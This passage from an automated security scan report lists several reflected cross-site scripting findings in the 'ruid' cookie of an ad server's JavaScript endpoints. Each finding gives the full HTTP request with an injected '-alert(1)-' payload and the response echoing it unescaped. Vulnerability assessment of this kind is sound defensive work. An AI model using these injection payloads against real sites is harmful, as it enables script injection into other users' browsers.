csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:20 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Tue, 23-Nov-2010 00:59:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 23-Nov-2010 00:59:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=2
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2677

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168960"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=b4b59"-alert(1)-"6d782b159b3\" width=\"1\" height=\"1\" />
...[SNIP]...

2.126. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22682-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62096"-alert(1)-"3de6488b762 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/22682-15.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=62096"-alert(1)-"3de6488b762; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:26 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Tue, 23-Nov-2010 00:59:26 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 23-Nov-2010 00:59:26 GMT; max-age=10; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3152311.js^2^1290469846^1290470366&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; expires=Mon, 29-Nov-2010 23:59:26 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=2
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2569

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3152311"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=62096"-alert(1)-"3de6488b762\" width=\"1\" height=\"1\" />
...[SNIP]...

2.127. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22682-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31b0d"-alert(1)-"5d034edb18a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/22682-2.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=31b0d"-alert(1)-"5d034edb18a; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:22 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Tue, 23-Nov-2010 00:59:22 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 23-Nov-2010 00:59:22 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=2
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2677

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168960"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=31b0d"-alert(1)-"5d034edb18a\" width=\"1\" height=\"1\" />
...[SNIP]...

2.128. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d19b"-alert(1)-"461fdc7af16 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7856/12590/22782-15.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=9d19b"-alert(1)-"461fdc7af16; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Tue, 23-Nov-2010 00:59:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 23-Nov-2010 00:59:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2720

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168958"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9d19b"-alert(1)-"461fdc7af16\" width=\"1\" height=\"1\" />
...[SNIP]...

2.129. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a4cc"-alert(1)-"e737024e70c was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7856/12590/22782-2.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=4a4cc"-alert(1)-"e737024e70c; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:18 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Tue, 23-Nov-2010 00:59:18 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 23-Nov-2010 00:59:18 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=3
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2720

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168960"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=4a4cc"-alert(1)-"e737024e70c\" width=\"1\" height=\"1\" />
...[SNIP]...

2.130. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebf57"-alert(1)-"bc9eda01a7c was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7856/12590/22893-15.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=ebf57"-alert(1)-"bc9eda01a7c; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:29 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Tue, 23-Nov-2010 00:59:29 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 23-Nov-2010 00:59:29 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=4
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2720

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168958"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=ebf57"-alert(1)-"bc9eda01a7c\" width=\"1\" height=\"1\" />
...[SNIP]...

2.131. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6725"-alert(1)-"a87cbd79931 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7856/12590/22893-2.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=e6725"-alert(1)-"a87cbd79931; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Tue, 23-Nov-2010 00:59:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 23-Nov-2010 00:59:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2720

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168960"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=e6725"-alert(1)-"a87cbd79931\" width=\"1\" height=\"1\" />
...[SNIP]...

2.132. http://optimized-by.rubiconproject.com/a/7858/12593/22707-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7858/12593/22707-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 439b2"-alert(1)-"2405f0f058e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request
